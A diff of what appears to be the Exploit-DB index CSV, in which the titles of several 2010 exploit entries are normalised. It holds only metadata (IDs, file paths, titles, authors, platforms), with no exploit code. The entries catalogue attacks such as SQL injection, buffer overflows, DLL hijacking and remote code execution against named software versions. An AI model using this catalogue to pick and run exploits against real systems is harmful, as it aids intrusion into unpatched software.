12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0 @@ -11518,7 +11518,7 @@ id,file,description,date,author,platform,type,port 12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0 -12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 +12614,platforms/windows/remote/12614.txt,"Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla! Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla! Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 @@ -11667,7 +11667,7 @@ id,file,description,date,author,platform,type,port 12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0 12781,platforms/php/webapps/12781.txt,"Joomla! Component com_jepoll - (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12782,platforms/php/webapps/12782.txt,"Joomla! Component com_jejob 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0 +12782,platforms/php/webapps/12782.txt,"Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0 12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0 @@ -12188,9 +12188,9 @@ id,file,description,date,author,platform,type,port 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,php,webapps,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0 -13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 -13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - XLS Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - (Mobile Office Suite) '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 +13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0 13826,platforms/php/webapps/13826.txt,"Site for Real Estate - Brokers SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13827,platforms/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",php,webapps,0 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0 @@ -12209,14 +12209,14 @@ id,file,description,date,author,platform,type,port 13842,platforms/asp/webapps/13842.txt,"VU Web Visitor Analyst - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13843,platforms/asp/webapps/13843.txt,"BrightSuite Groupware - SQL Injection",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13844,platforms/php/webapps/13844.pl,"Collabtive 0.6.3 - Multiple Vulnerabilities",2010-06-12,DNX,php,webapps,0 -13845,platforms/php/webapps/13845.txt,"Yamamah (news) - SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,php,webapps,0 +13845,platforms/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,php,webapps,0 13846,platforms/asp/webapps/13846.txt,"BDSMIS TraX with Payroll - SQL Injection",2010-06-12,"L0rd CrusAd3r",asp,webapps,0 13847,platforms/php/webapps/13847.txt,"phpplanner - Cross-Site Scripting / SQL Injection",2010-06-12,anT!-Tr0J4n,php,webapps,0 13848,platforms/php/webapps/13848.txt,"Infront - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13849,platforms/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80 13852,platforms/php/webapps/13852.txt,"PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 -13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 +13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 13854,platforms/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",php,webapps,0 13855,platforms/php/webapps/13855.txt,"Eyeland Studio Inc. - SQL Injection",2010-06-13,Mr.P3rfekT,php,webapps,0 13856,platforms/php/webapps/13856.txt,"Yamamah Photo Gallery 1.00 - 'download.php' Local File Disclosure",2010-06-13,mat,php,webapps,0 @@ -12337,7 +12337,7 @@ id,file,description,date,author,platform,type,port 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,php,webapps,0 -13993,platforms/php/webapps/13993.txt,"k-search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +13993,platforms/php/webapps/13993.txt,"K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 14512,platforms/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 @@ -12422,12 +12422,12 @@ id,file,description,date,author,platform,type,port 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 -14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript - (ypncat_id) SQL Injection",2010-06-29,v3n0m,php,webapps,0 +14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript - 'ypncat_id' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure dotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,multiple,webapps,80 -14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script - (docID) SQL Injection",2010-06-29,v3n0m,php,webapps,0 +14109,platforms/php/webapps/14109.txt,"YPNinc PHP Realty Script - 'docID' SQL Injection",2010-06-29,v3n0m,php,webapps,0 14110,platforms/php/webapps/14110.txt,"Allomani - E-Store 1.0 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0 @@ -12477,9 +12477,9 @@ id,file,description,date,author,platform,type,port 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0 14183,platforms/php/webapps/14183.txt,"Joomla! Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0 14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 -14180,platforms/windows/remote/14180.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14181,platforms/windows/remote/14181.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 +14182,platforms/windows/remote/14182.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 @@ -12542,10 +12542,10 @@ id,file,description,date,author,platform,type,port 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla! Component com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0 -14254,platforms/osx/remote/14254.py,"Apple Mac OSX (Snow Leopard) EvoCam Web Server - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 +14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 -14256,platforms/windows/local/14256.txt,"HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 +14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0 14259,platforms/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps,0 @@ -12643,7 +12643,7 @@ id,file,description,date,author,platform,type,port 14421,platforms/asp/webapps/14421.txt,"Mayasan Portal 2.0 - (haberdetay.asp) SQL Injection",2010-07-20,CoBRa_21,asp,webapps,0 14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",windows,remote,0 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 -14387,platforms/multiple/remote/14387.html,"Safari Browser 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 +14387,platforms/multiple/remote/14387.html,"Apple Safari 4.0.2 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14388,platforms/multiple/remote/14388.html,"Netscape Browser 9.0.0.6 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 14389,platforms/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0 14390,platforms/php/webapps/14390.txt,"Freelancer Marketplace Script - Arbitrary File Upload",2010-07-17,Sid3^effects,php,webapps,0 @@ -12749,7 +12749,7 @@ id,file,description,date,author,platform,type,port 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos,0 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,windows,dos,0 14518,platforms/php/webapps/14518.txt,"Joomla! Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 -14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (Internet Explorer 6/7'",2010-07-31,Dr_IDE,windows,remote,0 +14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 @@ -12759,7 +12759,7 @@ id,file,description,date,author,platform,type,port 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 -14538,platforms/ios/local/14538.txt,"Apple iOS - pdf Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 +14538,platforms/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak Exploit",2010-08-03,jailbreakme,ios,local,0 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service",2010-08-03,"Shane Bester",multiple,dos,0 @@ -12768,7 +12768,7 @@ id,file,description,date,author,platform,type,port 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Exploit",2010-08-04,"Oh Yaw Theng",windows,local,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format Denial of Service",2010-08-03,antrhacks,windows,dos,0 14566,platforms/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 -14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0 +14547,platforms/windows/remote/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 @@ -12898,7 +12898,7 @@ id,file,description,date,author,platform,type,port 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0 -14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 +14723,platforms/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0 14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0 14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0 @@ -12923,7 +12923,7 @@ id,file,description,date,author,platform,type,port 14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 -14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0 +14756,platforms/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 @@ -12931,7 +12931,7 @@ id,file,description,date,author,platform,type,port 14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0 14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 -14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 +14765,platforms/windows/local/14765.c,"Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0 14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0 14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0 @@ -13037,7 +13037,7 @@ id,file,description,date,author,platform,type,port 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 -14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 +14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 Free - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0 14923,platforms/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0 @@ -13275,7 +13275,7 @@ id,file,description,date,author,platform,type,port 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0 -15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta Release - Remote File Inclusion (Metasploit)",2010-10-12,v3n0m,php,webapps,0 +15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit)",2010-10-12,v3n0m,php,webapps,0 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 @@ -13295,7 +13295,7 @@ id,file,description,date,author,platform,type,port 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0 15257,platforms/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 15258,platforms/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",windows,dos,0 -15259,platforms/windows/dos/15259.txt,"DATAC RealWin 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0 +15259,platforms/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0 15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0 15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0 @@ -13307,11 +13307,11 @@ id,file,description,date,author,platform,type,port 15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar (com_jeajaxeventcalendar) - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 -15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 +15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 -15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 +15278,platforms/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow",2010-10-19,Mighty-D,windows,local,0 @@ -13357,7 +13357,7 @@ id,file,description,date,author,platform,type,port 15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 15335,platforms/php/webapps/15335.txt,"Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0 -15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 +15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0 15338,platforms/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection",2010-10-27,EraGoN,php,webapps,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15340,platforms/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",php,webapps,0 @@ -13448,7 +13448,7 @@ id,file,description,date,author,platform,type,port 15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0 